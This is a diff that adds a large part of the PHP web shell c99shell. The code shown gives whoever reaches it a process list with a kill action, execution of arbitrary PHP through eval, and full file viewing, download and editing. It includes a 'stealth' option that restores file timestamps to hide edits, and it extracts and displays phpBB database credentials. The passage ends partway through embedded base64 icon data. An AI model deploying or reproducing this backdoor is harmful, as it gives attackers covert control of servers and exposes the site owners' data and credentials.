+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
